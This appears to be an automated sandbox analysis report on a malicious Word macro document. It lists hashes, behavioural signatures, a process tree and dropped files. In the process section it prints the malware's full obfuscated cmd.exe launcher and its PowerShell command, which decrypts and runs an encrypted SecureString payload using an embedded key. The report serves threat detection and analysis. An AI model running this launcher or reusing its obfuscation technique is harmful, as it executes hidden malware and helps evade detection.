Analysis

  • max time kernel
    141s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-05-2024 18:43

General

  • Target

    72e69b0bbd5fb4d0d83a7fe4fe8f1234_JaffaCakes118.doc

  • Size

    195KB

  • MD5

    72e69b0bbd5fb4d0d83a7fe4fe8f1234

  • SHA1

    2ee022c7b7e85dce006c19a963fcdbae2b0c85da

  • SHA256

    5b9bce29afccc2b7c343b74f571061dd8c148a162849b1263913f549a5f14ce0

  • SHA512

    5634d571ecf9c1f67d05c4d3ec934b5970292fcc34765c99fe6d91f4270e09d9ae9becd9f4d661f19bcaa24c97cb1122eae852a483c2746c674732dd11d545c6

  • SSDEEP

    3072:cgn/iKFBaqCHonM8VIGNsmBGorUKqkr+1NPnjnw8WKzR:cg/iQBacxNsmBGo4dkruBnjw8

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\72e69b0bbd5fb4d0d83a7fe4fe8f1234_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4748
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" YHlNCRaMuFaDT iFHuAKCifprwwAmRsKw YzdoijvuUPa & %^C^o^m^S^p^E^c^% %^C^o^m^S^p^E^c^% /V /c set %zTOpZSzwuUrzNKL%=FmcpqXGKjQdocU&&set %JwmDJiiw%=p&&set %VVvAbUYhRzWLA%=o^w&&set %PbRZwIkZzuwSmlv%=SrZtnlthiZMDG&&set %TESkLfMR%=!%JwmDJiiw%!&&set %IoLUZEPfoOCPfoh%=XlUPuzmPihiik&&set %JQjTXiIwH%=e^r&&set %WfJPszLzNRcJXq%=!%VVvAbUYhRzWLA%!&&set %cTBUOhlq%=s&&set %uWvjToFnwMhjJic%=iHwLpHnroL&&set %iYnlXDfjwztpzJ%=he&&set %dndPGSiZOoY%=ll&&!%TESkLfMR%!!%WfJPszLzNRcJXq%!!%JQjTXiIwH%!!%cTBUOhlq%!!%iYnlXDfjwztpzJ%!!%dndPGSiZOoY%! " .( $eNv:COmspEc[4,24,25]-JOIn'')( ( [runTime.iNterOPSERvIces.mArSHAL]::ptRtOSTRINgaNSi([RUntime.iNteRoPSeRvICeS.MArShaL]::SECurEStrInGtOglObaLAllocAnSi($('76492d1116743f0423413b16050a5345MgB8AGYAdwA3AEMAaQA1AE8AbQAyAEMAbAAzAFYAbwBMADYAQgBOAE4AQQA5AEEAPQA9AHwAMAA0ADEANQBkAGYANgA1AGEAOAAwADcAZgA2ADcAMAA4ADQANwAzAGQAYQBlAGYAMQBlADgAZABhADEAMQBjADcAZQBlADIAZAAwAGIAOQA2ADAAYwA2AGYAYgBhAGIANABhADEANQBlADcAZQA2AGIAZQAwAGUAOAAzADMAMwAyADQANwA5ADcAZQA3ADMAYwA3ADAAOAA3AGYAYgBlAGYANwBjADgAOAA4ADYAYQBhADEAYwBiADAAOQBkADUAYQAzADUAOAA2AGYAZgBmADQANQA4ADQAZgAxADEANwBjADAAMgBmAGQANgAxADUANQA4ADkAMgA4AGIAZAAzADgAZgAwAGUAZABiAGUAMwA4ADAANwBjAGUAMQAxADkANwA1ADAAMgAzAGUAMgAzADYAZgA0ADUANABlADMANQAzAGQAMgA1AGQANgA2ADkAYwAxAGMAMgA4ADUAYgAzADMAYwBjADkANAA0ADUANgA2AGQAMAAyADAAYgA5ADYAOABjAGIAYQAzAGIAMQA4ADYANQBjADYAZQA1ADkAMAA4AGUAOQAzAGUAOQAzAGEAMgA1AGMAZgAyAGIAMwA0ADUAOQA4ADAAYQAxADYAYwA2AGEAYQBmAGYANwA0ADkAZgA4AGIAMwBlADQAZQAwAGQAYQA4ADEAMgAyADQAMAAwADIANgAwAGQAYQA5AGIAMQBhADgAMAAwADMAZAAyAGMAYwA4ADUANgA2ADcAOQA2ADkAMQAzADEANQA0ADEANQA2AGUAZQBjAGIAZgBmADkAMwA2AGUAYwA5ADEAZgAzADYAZQA3ADYAOQBjAGIAMwA1ADAANwBiAGQANwA0ADIAYgA3AGEAYgBkADEAMgAyADkAOQBhAGEAYQBlAGUAMgA3ADEAZAA4AGMAZgA1ADQAMwAyADcAOQBkADIAMAA4ADMAOAAyADUAMwA2ADIANwA4ADEAZABmAGEAYgA5AGIAMwA3AGUAOABhAGIAMQA5AGUAMQBjADEAMAA3ADUAOABjADYAZgBmADUAZABmADEANwA4ADYAMQA2ADYAYQAwADMAZQBjAGUAZQA0ADMAOQA3AGQAZgAwADIAYwA1AGUAZAA5ADYAYgA1ADQANwAzADgANwA0ADQAYwAwADEANgA4ADEAOABmADgAMwBmAGQAYgAyAGEAZgAyAGUAZgA1ADQAYgA2ADYAZQA3ADEANwAyADIAMAAyADcAOQA2ADgAZABlADIAYwAzADEAYwBlADIANQAwAGYAOAA3AGIAZABiAGMAYgBhADkAYQAxADUANABiADIANwA1AGUAMgBlADUANAAyAGIANQAzADcANgBiAGUAMABmAGMAYgBhADAAMAA2ADYANgBlAGYAYgBjADEAMwBkADYANABkADkAYwA4ADIANgAxAGQANABiADYANgAxAGUAOAA5ADgAZgA5AGIAMQAxADEAMgAzAGEAZABiADIANwAwAGQANwA4ADgAMQA2ADYAYQBjAGIAYgAyADMANABkAGUAYwBlAGIAZQA2ADQAMwAyADgAYQAzADIANgA1AGYAOQBmADkAYQA5AGYANgA3AGUANABhADMAZQAyADEAMQA4ADIAMQA5AGIAZABhAGIAOQBkAGQANAAyAGEAOQBjADYAMwBhADcAYgA1ADYANAA2ADAAMAA0ADQAYgBmAGYAOABiAGYAMwBiAGQAYgA0AGUANQAyADcAZgBjADIANgA1AGIAMQBlADUAMAA0AGYANQA1ADEANgA0AGEAYgBjAGIAOAAxADYANgAwADUAYgAyADgAYgA3ADMAMABmADEAZQBiADIAOABiADgANAAxAGIAMQA5ADMAOQBjADYAYgAwAGQANQA4ADkAOQA2AGUAMABlADYAMQBmADAANQBlAGIAZQAzADAAMQAwADkAMQA2ADYAMABiAGUAOAA1AGIANwBmADUAMgAxAGYAYQBmAGUAMwA3AGUAZQAxAGEAMwA5ADUANQA5ADcAMABjAGQAYQBlADYAMQBiADMAOAA4ADgAZQA3ADYANgBkADMAYgA3ADgAOQA5AGQAMAAyAGEAZAA0ADcAMABjADUAZQBkADkAZAAzADEAZABiADkAMwAzADUAZAA1ADEANQAxADkAYwA0ADkAYwBhAGUAZABmADAAZQA2ADAANABlADUAOAA0ADQAMABhADgAMAA4AGIANgA3ADcAYwA3ADYAYQA4ADMAOQBmAGYANwAxADkAYgAzADMAYgA3ADcAMwA3ADEAMQAwADYAZgA0AGEAZgBlADUAYgBiAGIAYQBhADMAYQAyADEAMgBiADcAMwA5AGEAMwAwADMAOQA1AGUANQBiAGMAZQBhADgANgA1ADQAMABjAGUAMgA1AGEAZAA5ADYAYgBmAGUAYgA2AGIAZQBjADAAMAAwADMAOAAwADAANgBkAGMAMwAzAGMAMQA4ADUANgBjAGEANQBjADIAMAA3AGIAMgA5AGIAOQA0ADgAMQBhADQAMQBmADQANQBlAGQAOAA4ADEAZgBjAGMAMwA1ADAAMABhAGEAMgBjADAAYQBhADcANwA3ADEAYgAyADQAZAA3ADQANQAwAGIAMgA4AGEAYwAzAGEAMwBiADYANQBmADAANgBiAGEAYgA1ADUAMgA3AGQAZgA5ADYAYgBhADkAOAAwADMAMwBiADMAMQA0ADcAYgBmADYAYgA0AGMANAAzAGUAMAA4ADAANwA4AGIANQA4ADgAMQBiAGMAYgBhAGYAOABlAGUANwBhAGQAMAA4AGMANwA1ADcAMQBkADUAYgA2AGEAYgBmAGEAZgAwADAAZgBhAGYAMQBiADQAYQBiADAAZQAyAGQAZQA1AGEAMwA1ADcAMQA3ADUANwA2AGIAMgBiADgAYQAxAGEAMAAxADEAMwBkADUANwBmADEAOABmADQAYgAwADYANAAxADIAOABjADEAZAA4ADgAMgBhADcAMwBiADMAYgAxADAAMQA3ADgAZgA1ADgAZQBlADEAMAAwADkAYwA2ADQANAAxADUAOQBhADkAYwAzAGQAYgA4ADgAZQAzAGEAMQAxADcANgBiAGEAYQA3ADgAZQA4ADIANQAyAGQAZQAyADUANAA1ADYAMAA3ADgAMAA5ADYANwA3AGMAMABmADIAZABmAGUAYwA2ADIAMAA5AGYAYgAxADcANABjADgAYgBlAGUAYgAzAGQAMQA1AGIAZAAxADUANgA4ADcAMgA2ADYAMgA4AGEAOQBlADMAYgA3ADcAZQA3AGMAZQA0ADMANQAyADMANQAzADQAYgAxADcANQA1ADUAYwBiADAAOAA3ADQAOABmAGQAYgA0AGIANQBhADgAYwBhAGQAZgA0ADIAMQA1ADkAOABmADgAZgA2ADQAOAAyAGYAOQBjADUANwBhADUAYgBkAGQAMQA0ADQAMABhADEAYgA2ADgANwBkAGMANQAwADIAZABkADgAYgBlAGUAMQA2AGUANQA4AGUAYQA5ADkANQAwAGYAMQA0ADcAYgBkAGUAMAA2AGUANwBlADUAYQBmADcAYQA3AGMAYwBlADEANwA2ADIAZABiADEANQA1ADgAYwA1ADMAYQA0AGMAYgA2ADcANQAzADMANABmADkAZABiADIAYQA0ADMANAAxADkAZAA2ADgAMABkADUAMAA2AGUANwBhADcAYgA1ADgAMAAwADkANgAzADAAZgA1AGMAYwA2ADgANAA3ADUANQBmADkANABkADMANwBjAGUAOQAxADYAMQBmAGUAMABjAGMAYwA0ADUAZQBiADgAMgAxAGQAOQA2ADYAOQBmAGMAMQBmADAAMQA2AGUAZQBlAGUANwA2AGIAZgA4AGIAYgBjAGYAYwBjADAAYwA5ADIANAA4ADAAYgBiAGIAMABiADMAOQBkADAAOQAyAGMANQBjAGEAOABmAGUAYwBlADgANQAzADQANgBlAGYAYwBkAGMANAA0ADUAZgBjAGEAZQA5ADYAZQAwAGMAMwBjADgAOQAxADgAYQBlAGIANABmADkAMwAwADYANgA1AGEAOAA5AGUAMQA4ADgAZQAyAGIAZQBkADgAYgA0AGYAYgA5ADMANQBlADMAMAAzAGEAZgBlAGQAOABiADgAYwBmAGUAYgA5ADkAOABlADgAYgBkAA=='| cONvERTto-SecURESTRING -KEy 172,5,138,199,147,157,132,126,84,135,12,101,187,119,252,98,95,45,151,67,128,60,158,229) ) ) ) )
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:4464
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell " .( $eNv:COmspEc[4,24,25]-JOIn'')( ( [runTime.iNterOPSERvIces.mArSHAL]::ptRtOSTRINgaNSi([RUntime.iNteRoPSeRvICeS.MArShaL]::SECurEStrInGtOglObaLAllocAnSi($('76492d1116743f0423413b16050a5345MgB8AGYAdwA3AEMAaQA1AE8AbQAyAEMAbAAzAFYAbwBMADYAQgBOAE4AQQA5AEEAPQA9AHwAMAA0ADEANQBkAGYANgA1AGEAOAAwADcAZgA2ADcAMAA4ADQANwAzAGQAYQBlAGYAMQBlADgAZABhADEAMQBjADcAZQBlADIAZAAwAGIAOQA2ADAAYwA2AGYAYgBhAGIANABhADEANQBlADcAZQA2AGIAZQAwAGUAOAAzADMAMwAyADQANwA5ADcAZQA3ADMAYwA3ADAAOAA3AGYAYgBlAGYANwBjADgAOAA4ADYAYQBhADEAYwBiADAAOQBkADUAYQAzADUAOAA2AGYAZgBmADQANQA4ADQAZgAxADEANwBjADAAMgBmAGQANgAxADUANQA4ADkAMgA4AGIAZAAzADgAZgAwAGUAZABiAGUAMwA4ADAANwBjAGUAMQAxADkANwA1ADAAMgAzAGUAMgAzADYAZgA0ADUANABlADMANQAzAGQAMgA1AGQANgA2ADkAYwAxAGMAMgA4ADUAYgAzADMAYwBjADkANAA0ADUANgA2AGQAMAAyADAAYgA5ADYAOABjAGIAYQAzAGIAMQA4ADYANQBjADYAZQA1ADkAMAA4AGUAOQAzAGUAOQAzAGEAMgA1AGMAZgAyAGIAMwA0ADUAOQA4ADAAYQAxADYAYwA2AGEAYQBmAGYANwA0ADkAZgA4AGIAMwBlADQAZQAwAGQAYQA4ADEAMgAyADQAMAAwADIANgAwAGQAYQA5AGIAMQBhADgAMAAwADMAZAAyAGMAYwA4ADUANgA2ADcAOQA2ADkAMQAzADEANQA0ADEANQA2AGUAZQBjAGIAZgBmADkAMwA2AGUAYwA5ADEAZgAzADYAZQA3ADYAOQBjAGIAMwA1ADAANwBiAGQANwA0ADIAYgA3AGEAYgBkADEAMgAyADkAOQBhAGEAYQBlAGUAMgA3ADEAZAA4AGMAZgA1ADQAMwAyADcAOQBkADIAMAA4ADMAOAAyADUAMwA2ADIANwA4ADEAZABmAGEAYgA5AGIAMwA3AGUAOABhAGIAMQA5AGUAMQBjADEAMAA3ADUAOABjADYAZgBmADUAZABmADEANwA4ADYAMQA2ADYAYQAwADMAZQBjAGUAZQA0ADMAOQA3AGQAZgAwADIAYwA1AGUAZAA5ADYAYgA1ADQANwAzADgANwA0ADQAYwAwADEANgA4ADEAOABmADgAMwBmAGQAYgAyAGEAZgAyAGUAZgA1ADQAYgA2ADYAZQA3ADEANwAyADIAMAAyADcAOQA2ADgAZABlADIAYwAzADEAYwBlADIANQAwAGYAOAA3AGIAZABiAGMAYgBhADkAYQAxADUANABiADIANwA1AGUAMgBlADUANAAyAGIANQAzADcANgBiAGUAMABmAGMAYgBhADAAMAA2ADYANgBlAGYAYgBjADEAMwBkADYANABkADkAYwA4ADIANgAxAGQANABiADYANgAxAGUAOAA5ADgAZgA5AGIAMQAxADEAMgAzAGEAZABiADIANwAwAGQANwA4ADgAMQA2ADYAYQBjAGIAYgAyADMANABkAGUAYwBlAGIAZQA2ADQAMwAyADgAYQAzADIANgA1AGYAOQBmADkAYQA5AGYANgA3AGUANABhADMAZQAyADEAMQA4ADIAMQA5AGIAZABhAGIAOQBkAGQANAAyAGEAOQBjADYAMwBhADcAYgA1ADYANAA2ADAAMAA0ADQAYgBmAGYAOABiAGYAMwBiAGQAYgA0AGUANQAyADcAZgBjADIANgA1AGIAMQBlADUAMAA0AGYANQA1ADEANgA0AGEAYgBjAGIAOAAxADYANgAwADUAYgAyADgAYgA3ADMAMABmADEAZQBiADIAOABiADgANAAxAGIAMQA5ADMAOQBjADYAYgAwAGQANQA4ADkAOQA2AGUAMABlADYAMQBmADAANQBlAGIAZQAzADAAMQAwADkAMQA2ADYAMABiAGUAOAA1AGIANwBmADUAMgAxAGYAYQBmAGUAMwA3AGUAZQAxAGEAMwA5ADUANQA5ADcAMABjAGQAYQBlADYAMQBiADMAOAA4ADgAZQA3ADYANgBkADMAYgA3ADgAOQA5AGQAMAAyAGEAZAA0ADcAMABjADUAZQBkADkAZAAzADEAZABiADkAMwAzADUAZAA1ADEANQAxADkAYwA0ADkAYwBhAGUAZABmADAAZQA2ADAANABlADUAOAA0ADQAMABhADgAMAA4AGIANgA3ADcAYwA3ADYAYQA4ADMAOQBmAGYANwAxADkAYgAzADMAYgA3ADcAMwA3ADEAMQAwADYAZgA0AGEAZgBlADUAYgBiAGIAYQBhADMAYQAyADEAMgBiADcAMwA5AGEAMwAwADMAOQA1AGUANQBiAGMAZQBhADgANgA1ADQAMABjAGUAMgA1AGEAZAA5ADYAYgBmAGUAYgA2AGIAZQBjADAAMAAwADMAOAAwADAANgBkAGMAMwAzAGMAMQA4ADUANgBjAGEANQBjADIAMAA3AGIAMgA5AGIAOQA0ADgAMQBhADQAMQBmADQANQBlAGQAOAA4ADEAZgBjAGMAMwA1ADAAMABhAGEAMgBjADAAYQBhADcANwA3ADEAYgAyADQAZAA3ADQANQAwAGIAMgA4AGEAYwAzAGEAMwBiADYANQBmADAANgBiAGEAYgA1ADUAMgA3AGQAZgA5ADYAYgBhADkAOAAwADMAMwBiADMAMQA0ADcAYgBmADYAYgA0AGMANAAzAGUAMAA4ADAANwA4AGIANQA4ADgAMQBiAGMAYgBhAGYAOABlAGUANwBhAGQAMAA4AGMANwA1ADcAMQBkADUAYgA2AGEAYgBmAGEAZgAwADAAZgBhAGYAMQBiADQAYQBiADAAZQAyAGQAZQA1AGEAMwA1ADcAMQA3ADUANwA2AGIAMgBiADgAYQAxAGEAMAAxADEAMwBkADUANwBmADEAOABmADQAYgAwADYANAAxADIAOABjADEAZAA4ADgAMgBhADcAMwBiADMAYgAxADAAMQA3ADgAZgA1ADgAZQBlADEAMAAwADkAYwA2ADQANAAxADUAOQBhADkAYwAzAGQAYgA4ADgAZQAzAGEAMQAxADcANgBiAGEAYQA3ADgAZQA4ADIANQAyAGQAZQAyADUANAA1ADYAMAA3ADgAMAA5ADYANwA3AGMAMABmADIAZABmAGUAYwA2ADIAMAA5AGYAYgAxADcANABjADgAYgBlAGUAYgAzAGQAMQA1AGIAZAAxADUANgA4ADcAMgA2ADYAMgA4AGEAOQBlADMAYgA3ADcAZQA3AGMAZQA0ADMANQAyADMANQAzADQAYgAxADcANQA1ADUAYwBiADAAOAA3ADQAOABmAGQAYgA0AGIANQBhADgAYwBhAGQAZgA0ADIAMQA1ADkAOABmADgAZgA2ADQAOAAyAGYAOQBjADUANwBhADUAYgBkAGQAMQA0ADQAMABhADEAYgA2ADgANwBkAGMANQAwADIAZABkADgAYgBlAGUAMQA2AGUANQA4AGUAYQA5ADkANQAwAGYAMQA0ADcAYgBkAGUAMAA2AGUANwBlADUAYQBmADcAYQA3AGMAYwBlADEANwA2ADIAZABiADEANQA1ADgAYwA1ADMAYQA0AGMAYgA2ADcANQAzADMANABmADkAZABiADIAYQA0ADMANAAxADkAZAA2ADgAMABkADUAMAA2AGUANwBhADcAYgA1ADgAMAAwADkANgAzADAAZgA1AGMAYwA2ADgANAA3ADUANQBmADkANABkADMANwBjAGUAOQAxADYAMQBmAGUAMABjAGMAYwA0ADUAZQBiADgAMgAxAGQAOQA2ADYAOQBmAGMAMQBmADAAMQA2AGUAZQBlAGUANwA2AGIAZgA4AGIAYgBjAGYAYwBjADAAYwA5ADIANAA4ADAAYgBiAGIAMABiADMAOQBkADAAOQAyAGMANQBjAGEAOABmAGUAYwBlADgANQAzADQANgBlAGYAYwBkAGMANAA0ADUAZgBjAGEAZQA5ADYAZQAwAGMAMwBjADgAOQAxADgAYQBlAGIANABmADkAMwAwADYANgA1AGEAOAA5AGUAMQA4ADgAZQAyAGIAZQBkADgAYgA0AGYAYgA5ADMANQBlADMAMAAzAGEAZgBlAGQAOABiADgAYwBmAGUAYgA5ADkAOABlADgAYgBkAA=='| cONvERTto-SecURESTRING -KEy 172,5,138,199,147,157,132,126,84,135,12,101,187,119,252,98,95,45,151,67,128,60,158,229) ) ) ) )
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4796

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDB749.tmp\gb.xsl

    Filesize

    262KB

    MD5

    51d32ee5bc7ab811041f799652d26e04

    SHA1

    412193006aa3ef19e0a57e16acf86b830993024a

    SHA256

    6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

    SHA512

    5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fdcotxyy.iyo.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/4748-10-0x00007FFA259F0000-0x00007FFA25A00000-memory.dmp

    Filesize

    64KB

  • memory/4748-8-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-5-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-38-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-6-0x00007FFA27E70000-0x00007FFA27E80000-memory.dmp

    Filesize

    64KB

  • memory/4748-42-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-9-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-45-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-0-0x00007FFA27E70000-0x00007FFA27E80000-memory.dmp

    Filesize

    64KB

  • memory/4748-11-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-12-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-13-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-16-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-15-0x00007FFA259F0000-0x00007FFA25A00000-memory.dmp

    Filesize

    64KB

  • memory/4748-14-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-21-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-20-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-19-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-18-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-17-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-4-0x00007FFA27E70000-0x00007FFA27E80000-memory.dmp

    Filesize

    64KB

  • memory/4748-1-0x00007FFA27E70000-0x00007FFA27E80000-memory.dmp

    Filesize

    64KB

  • memory/4748-7-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-51-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-52-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-50-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-53-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-54-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-3-0x00007FFA67E8D000-0x00007FFA67E8E000-memory.dmp

    Filesize

    4KB

  • memory/4748-577-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-2-0x00007FFA27E70000-0x00007FFA27E80000-memory.dmp

    Filesize

    64KB

  • memory/4748-540-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-551-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-550-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-552-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-553-0x00007FFA67DF0000-0x00007FFA67FE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4748-574-0x00007FFA27E70000-0x00007FFA27E80000-memory.dmp

    Filesize

    64KB

  • memory/4748-575-0x00007FFA27E70000-0x00007FFA27E80000-memory.dmp

    Filesize

    64KB

  • memory/4748-576-0x00007FFA27E70000-0x00007FFA27E80000-memory.dmp

    Filesize

    64KB

  • memory/4748-573-0x00007FFA27E70000-0x00007FFA27E80000-memory.dmp

    Filesize

    64KB

  • memory/4796-64-0x000001D3A2DD0000-0x000001D3A2DF2000-memory.dmp

    Filesize

    136KB